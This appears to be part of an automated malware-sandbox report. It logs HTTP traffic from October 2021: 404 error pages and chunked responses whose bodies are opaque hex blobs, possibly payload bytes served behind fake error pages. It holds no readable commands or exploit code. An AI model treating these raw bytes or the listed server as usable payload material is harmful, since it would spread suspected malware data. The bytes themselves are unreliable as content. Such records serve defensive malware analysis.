5b af 18 9f 7a bd 0c 93 a6 69 3e 1a 20 8c 63 bb ca c9 ba ad f5 31 61 a4 cf 37 1f 1a eb 3f 82 c2 74 e1 81 8f f5 03 96 07 cd 96 df a5 61 6c fd 71 12 70 df ce 22 db 30 d5 a9 b6 2a 08 8f 01 e9 46 76 22 e1 ff b8 5c 3f 1f 83 d0 30 38 ba 60 bd 49 22 09 69 53 40 98 e3 94 54 e0 2f 60 43 8c 67 f0 86 f0 fb 34 6c 1b 45 6e d5 f6 4e 76 8c 9e cd 37 14 39 7e a2 55 6b 5f c7 ae 4a 88 54 d9 60 49 d3 03 e7 fe 88 2c c7 1f fd 10 e5 ec 9a db 25 79 41 75 04 c5 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 49 4f 44 e8 d0 32 79 2e 0a ba e8 33 5c b0 05 89 52 1e 05 63 bb 9a d4 46 d1 a0 3c df d5 bf 2b 02 87 d2 db 53 3d a0 c3 96 cb 7d 64 57 b4 85 5b ae 39 16 1b e2 99 15 f7 bb 2e 44 3d e2 08 5a 11 dc 40 9e 02 91 b1 41 6b 05 23 9f f5 4a b0 6e 78 0d 2a f7 d8 d2 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 b2 d6 ea ec 0f f8 14 a3 0b ab c1 39 e2 a7 66 94 c6 a6 d3 30 18 65 17 b2 f4 a7 c1 58 40 f6 e7 2a 9d 72 08 ac 54 7b 52 ff eb 48 5a 75 56 4f 82 56 c3 e9 37 7f a3 29 ff f1 ee 21 bd b4 4f 07 bb 75 4b 99 01 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 93 03 e8 a9 51 04 f8 fc b7 2c f4 47 1b 3f 4d 93 e6 9f 70 06 c5 52 89 52 8c 3e 09 6e be ca 39 52 41 cc 35 5f 27 89 98 4c 68 48 94 56 10 02 37 e2 be 43 f0 8b 9a 47 8a 76 1e 5e 84 8e 8e 8b 0d 16 21 95 87 04 73 2d c7 4c 02 f6 30 60 f4 6b 3d 82 ae 74 99 df 92 5a 4d aa 78 71 b0 7b 66 f4 eb 40 3a aa db da 2b 5c cb e1 59 fb c4 57 cc 6f e6 65 be a9 0b 89 8b 87 2b 02 02 53 d6 5a e3 95 e6 d8 99 0a e2 4c 97 6f 09 c5 e9 fd c7 23 56 3e ec ab 1c 2b 48 06 30 c8 0b 4c c7 c7 5f c6 c9 6b ad 20 23 6b de a1 9f 3f b0 fc f8 06 04 cd 51 e5 30 d5 71 ef d6 a3 96 1c 41 be c0 52 50 1f fb 55 d2 7a b6 d5 5b d4 72 ed f6 4b a5 53 52 d2 c1 d4 d1 79 5e 67 ad 6d 11 30 c0 db 31 a2 29 77 31 ac b2 03 04 1e 57 f3 28 bc cb 58 67 5b 5b 67 c2 3f c3 78 d9 e8 1f ba e2 50 11 3b fc 5f e0 3c c7 4b d4 50 b0 20 e1 1e 3c d7 d3 2e e3 9c d8 f7 0d 82 23 af 40 16 06 1f 84 4c 7f 4f 6d 5b df 92 a0 c7 0b 80 51 a9 cd 6d e1 0c 1c 9d 89 05 4d 99 20 83 58 13 87 89 b0 6e 2c 9c c3 75 44 f4 8b 85 52 2a a2 e4 2f a9 e7 5b 9a 1e bc 79
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:11 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 40 26 0b 04 59 b9 1d 6d f5 e9 e6 a1 29 7a 3a 62 c3 cc a7 43 ec 44 d7 6b 50 78 18 e0 30 8a 3c a2 61 a3 d6 d4 22 a2 58 d5 5b 2d 22 ad 88 88 5e 6f d7 9f b7 ee bc db 32 b9 9a 4c ca 4c 08 03 d4 d2 a1 97 c6 37 13 4b 42 c4 d4 5a c6 ca 23 e8 16 41 bf 6c 13 d9 c8 9f 57 db 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 88 b6 4b 24 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f eb 92 24 82 45 c5 03 49 bd a3 61 7e de f5 69 33 11 17 7e 4f af 9a a5 e4 c3 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 11 41 48 9a 07 fd ec 23 20 77 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 d5 20 c6 4f 6b 79 82 ae 9c a7 82 4e 95 1f ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 75 6c e5 ee 30 4c 80 f0 00 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 9a 70 f7 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 bb 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 39 07 bd 1b 6f d3 cb 29 32 a2 ed 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 13 61 6a e6 a6 dd 1a 9f 10 af d9 b0 99 89 93 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb e1 33 17 28 d2 9e c6 1d d0 eb aa 7a 8f 52 61 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e 75 82 71 d4 03 6b 2c 9a 76 48 0e ca 82 21 2f 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:12 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:12 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=93Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 33 62 39 32 30 32 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 7d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 60 d5 d3 ef 7b c0 4d c5 0c cd ac 7a b7 be 4f 41 dd 46 29 0a e9 36 a7 19 bc 64 89 2e 7c 6f 3b 05 14 41 67 ef 3b f3 56 72 3e 8f 19 04 b2 10 12 87 d6 37 cb 3a fa 04 f1 07 a0 e2 19 17 80 2f ba 8e 42 0d 0a 7e 82 cf 27 11 d8 9d 1d b3 9c 88 8a 38 22 da 52 2e e6 2c 7e d7 ff bc a2 2e cb 81 88 4b 55 09 84 c1 1e 3b 50 6b bd ce d3 58 87 d6 41 c9 b0 26 0c 94 d0 99 7d 5a 99 0b 99 5b af 18 9f 7a bd ed 94 a6 32 3e 1a 20 8c 63 b3 ca 21 bf ad f5 31 61 a4 cf 37 1f 1a eb 3f 8c ff 74 3d 9f 8e f5 03 b6 0f cd 9a df a5 61 6c fd 71 12 70 df ce 22 db 30 d5 a9 b6 2a 08 8f 01 e9 46 76 22 e1 ff b8 5c 3f 1f 83 d0 30 38 ba 60 bd 49 22 09 69 53 40 98 e3 94 54 e0 2f 60 43 8c 47 f0 86 f8 fb 34 6c 1b 45 6e d5 f6 4e 76 8c 96 ed 37 14 71 7e a2 55 6b 5f c7 ae 4a 88 54 d9 4e 5d 8e 7b db fe 88 2c 93 de fa 10 e5 cc 9a db 66 dc 31 5d 0e 88 9d 8f 93 f2 2f 81 5d 06 db 3a 35 b1 cf d5 69 4b 44 88 fe 40 0a 5c 69 ba e8 33 b4 b5 05 89 12 1e 0d 83 95 e8 b1 3e a5 64 3b df 39 ec 29 02 87 b2 e3 53 3d f4 c1 96 8b 4d 5c 17 9a f7 3e c2 56 75 1b e2 95 15 f7 bb 0e 64 35 82 26 2a 62 ae 23 54 05 91 d5 4c 6a 05 23 5f cf 4a b0 60 79 0d 6a 73 e2 90 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 f2 d6 ea ac 3f 19 13 a3 0b ab c1 39 aa a7 66 94 c4 a6 d6 30 80 10 10 b2 9c cc c1 58 43 f6 e7 2a 92 72 08 aa 14 21 52 ff b3 53 5d 75 56 4f 82 56 c3 e9 37 7f a3 29 ff f1 ee 21 bd b4 4f 07 bb 75 4b 99 01 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 93 03 e8 a9 1c 5e 68 fc b4 2c f4 47 1f 3f 4d 93 19 60 70 06 7d 52 89 52 8c 3e 09 6e fe ca 39 52 41 cc 35 5f 27 89 98 4c 68 48 94 56 10 02 37 e2 be 43 f0 8b 9a 47 8a 76 1e 5e 84 8e 8e 8b 0d 16 a1 95 87 04 7d 32 7d 42 02 42 39 ad d5 d3 3c 86 63 55 cd b7 fb 29 6d da 0a 1e d7 09 07 99 cb 23 5b c4 b5 b5 5f 7c a9 84 79 89 b1 39 ec 06 88 45 fa e6 58 a9 e6 e8 4f 67 2c 5e db 50 c7 95 e6 d8 99 0a e2 4c c7 2a 09 c5 ed fc c4 23 ef 28 ef 3e 1c 2b 48 06 30 c8 0b 4c 27 c7 7d e6 c2 6a fd 20 23 71 de a1 9f 39 b0 fc f8 06 04 cd 0b dd 30 d5 71 cf d6 a3 96 5c 41 be c0 52 50 0f fb 75 d2 7a b6 d7 5b d4 76 ed f6 4b a5 53 52 d2 c5 d4 d1 79 5e 67 ad 6d 11 b0 c0 db 31 a0 29 77 31 ac b2 03 07 1e 17 76 28 bc db 58 67 4b 5b 67 c2 3f d3 78 d9 f8 1f ba e2 50 11 3b ec 5f e0 3c c7 4b d4 50 b0 20 e1 1e 34 ef d3 2e ac 9c d8 f7 0d c2 23 af 38 15 06 1f 84 4c 7f 4f 6d 5b df 92 a0 c7 0b 80 51 a9 cd 6d e1 6c 1c 9d 89 05 4d 99 2e b4 58 13 86 89 b0 6e 2c 9c c3 75 44 f4 8b 85 52 2a a2 e4 2f a9 e7 5b 9a 1e bc
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 b1 ba 89 c7 a8 25 9f ae 04 75 64 62 d8 e6 b8 a1 54 5e 1b 80 2b d8 55 a8 c7 ea 87 23 6d 16 be 61 f6 31 6d 17 41 3e da 16 a3 c9 32 6e a0 14 dc ac 2f 7b b0 2d 61 47 b0 7a 0d de 75 8f f9 9f 56 11 36 05 4a f4 e2 d7 c0 07 43 c8 48 09 d2 74 94 82 bf 6c 13 d9 39 03 d5 18 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 8e ff 0e 43 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 85 f6 ff 78 f3 56 db c4 0d 13 13 e3 0f e0 92 24 18 4f c5 03 71 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a f0 96 be 21 51 61 9a d4 3e 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 a2 7a 31 6c 1a 7c 0a 8d 1b f9 e6 0e 10 eb 7e 71 eb 90 f0 1a 10 de 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 22 a6 0f 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 73 33 cd 46 99 48 15 ac af eb d9 55 3d af ba 68 92 de fe 9d 57 7c 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b a8 d4 de 8e 82 11 e8 e4 1f 9e a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 af 5b 85 1f d4 8c 69 91 9c 61 06 f1 2c 9a af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 e4 56 89 8b e1 42 78 d7 9c 9e c3 e0 2b a5 b6 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 a2 aa 45 63 80 e3 1c b1 65 f5 52 48 d4 3f 96 4d 8d e7 17 3f fe e7 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:16 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:11:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc df 85 6e bb f6 c7 35 f3 73 07 03 d2 ff f9 da fb eb b2 b9 71 cd f5 34 33 d1 62 73 45 7c 1f 57 44 f3 08 b9 3c 50 15 51 fe 08 22 b1 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed 45 78 b1 17 20 58 4a ed 68 6a 3e 17 21 6b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 5c 6d 52 db 93 0d 13 13 bf 1e e9 92 28 0e 4f c5 03 a1 cb a1 61 7e de f5 69 77 1e 17 c6 4c af 9a a5 64 c1 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 d3 fb 2d b9 72 ce cc 23 b2 b7 09 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f 3f cf cc 46 d9 48 1d ac af e3 d9 55 3d 6b bd 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 aa 6c b1 1d 32 12 51 8c bc 10 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 46 9d 16 ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 74 5d 01 f1 10 35 ae 03 58 e5 1f e4 ae 7d 10 99 80 e0 d9 b0 c1 1c 9e 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 80 8a 49 37 03 80 e3 1c cd 20 f5 52 b7 3b 3a 96 f5 cb e7 17 3f dc e5 7e 0d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 98 